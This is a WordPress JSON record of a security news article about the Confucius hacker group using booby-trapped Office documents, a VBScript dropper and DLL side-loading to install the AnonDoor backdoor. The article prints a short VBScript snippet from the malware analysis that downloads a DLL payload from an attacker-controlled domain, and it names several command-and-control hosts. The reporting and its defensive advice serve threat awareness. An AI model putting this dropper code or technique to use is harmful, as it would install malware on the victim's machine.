{"id":7388,"date":"2025-10-03T10:04:31","date_gmt":"2025-10-03T10:04:31","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/03\/confucius-hacker-group-attacking-weaponizing-documents-to-compromised-windows-systems-with-anondoor-malware\/"},"modified":"2025-10-03T10:04:31","modified_gmt":"2025-10-03T10:04:31","slug":"confucius-hacker-group-attacking-weaponizing-documents-to-compromised-windows-systems-with-anondoor-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/03\/confucius-hacker-group-attacking-weaponizing-documents-to-compromised-windows-systems-with-anondoor-malware\/","title":{"rendered":"Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware"},"content":{"rendered":"<p>    Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed <strong>AnonDoor<\/strong>.<\/p>\n<p>Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, <a href=\"https:\/\/cybersecuritynews.com\/lumma-stealer-evolves-with-new-powershell-tools\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell<\/a> loaders, and scheduled tasks to achieve persistence and evade detection.<\/p>\n<p>This evolution underscores the group\u2019s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj30TSvdjHK9CHFXffkHeBytBQbtDACQ0CLF7CeklwesKa8jBV5JTsgQMe9KhK5mrwR4DI1ljgagJs_xylmVcwMLVqJfpwYx3AQ0SObklf6fU7jSi_rxKFqSGpQDY6yUSF4akssnP0FvgK5X5s_CpaUvLymKYHbGk15PKjKD0XatNnK0Ch7qRWswnydfGg\/s16000\/Confucius%25E2%2580%2599%2520activities%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Confucius\u2019 activities (Source \u2013 Fortinet)<\/figcaption><\/figure>\n<\/div>\n<p>Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.<\/p>\n<p>When unsuspecting users open these documents, they encounter a \u201cCorrupted Page\u201d prompt that conceals an embedded OLE object.<\/p>\n<p>This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.<\/p>\n<p>Fortinet researchers <a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/confucius-espionage-from-stealer-to-backdoor\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.<\/p>\n<p>Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to <code>%LocalAppData%Mapistub.dll<\/code>, and then stages execution via DLL side-loading.<\/p>\n<p>The dropper also copies a legitimate executable to <code>%AppData%Swom.exe<\/code> and writes a registry key under <code>HKCUSoftwareMicrosoftWindowsCurrentVersionRun<\/code> to ensure the side-loaded DLL is launched on each login.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlf-HuMOFor-Uk4d7uLv4yLAPAVQ8Ot1t3zJpyXKGJnIAmT6r8I-bsFrj0tZkQoODSWLU6wj7q2DdUQX_5T1syAVNut73PMabuwxLRks3x6jP2tIBrr_We3RNMRvWj1eMWxya819w5iPz3S8PCnUy582PryPnojOGUTLiy89wvahXKmMVUnQr71ubTG-g\/s16000\/Download%2520DLL%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Download DLL (Source \u2013 Fortinet)<\/figcaption><\/figure>\n<\/div>\n<p>This strategy not only conceals the malicious binary within trusted processes but also provides robust <a href=\"https:\/\/cybersecuritynews.com\/detecting-and-responding-to-new-nation-state-persistence-techniques\/\" target=\"_blank\" rel=\"noreferrer noopener\">persistence<\/a> without generating conspicuous artifacts.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism\"><strong>Infection Mechanism<\/strong><\/h2>\n<p>The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.<\/p>\n<p>First, the document\u2019s OLE object references an external <a href=\"https:\/\/cybersecuritynews.com\/vbscript-deprecation\/\" target=\"_blank\" rel=\"noreferrer noopener\">VBScript<\/a> hosted on greenxeonsr.info.<\/p>\n<p>The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:-<\/p>\n<pre class=\"wp-block-code\"><code>Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.Open \"GET\", \"https:\/\/greenxeonsr.info\/Jsdfwejhrg.rko\", False\nobjXMLHTTP.Send\nSet objStream = CreateObject(\"ADODB.Stream\")\nobjStream.Type = 1 ' Binary\nobjStream.Open\nobjStream.Write objXMLHTTP.responseBody\nobjStream.SaveToFile WScript.Network.UserName &amp; \"Mapistub.dll\", 2\nobjStream.Close<\/code><\/pre>\n<p>Once the DLL is in place, the dropper invokes a reconstructed <code>ShellExecute<\/code> call to launch <code>Swom.exe<\/code>, which side-loads the DLL into memory.<\/p>\n<p>The DLL subsequently reaches out to multiple C2 domains\u2014cornfieldblue.info and hauntedfishtree.info\u2014to retrieve further payloads, including the WooperStealer module and additional configuration files.<\/p>\n<p>This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.<\/p>\n<p>By chaining document-based exploitation with obfuscated scripting and <a href=\"https:\/\/cybersecuritynews.com\/hackers-employ-dll-side-loading\/\" target=\"_blank\" rel=\"noreferrer noopener\">DLL side-loading<\/a>, Confucius demonstrates advanced operational security and resilience against endpoint defenses.<\/p>\n<p>Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.<\/p>\n<p>Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a><\/strong>.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/confucius-hacker-group-attacking-weaponizing-documents\/\">Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/confucius-hacker-group-attacking-weaponizing-documents\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor. Historically known for deploying document stealers such as WooperStealer, the threat actor has now [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7388","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7388"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7388"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7388\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}